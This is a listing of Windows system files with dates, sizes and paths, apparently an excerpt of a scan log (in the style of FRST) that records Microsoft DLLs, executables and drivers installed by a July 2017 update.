2017-07-11 20:54 - 2017-06-20 07:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 06:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-11 20:53 - 2017-07-07 09:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-11 20:53 - 2017-07-07 09:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-11 20:53 - 2017-07-07 08:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-11 20:53 - 2017-07-07 08:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-11 20:53 - 2017-07-07 08:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-11 20:53 - 2017-07-07 08:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-11 20:53 - 2017-06-20 08:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-11 20:53 - 2017-06-20 08:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-11 20:53 - 2017-06-20 08:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-11 20:53 - 2017-06-20 07:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
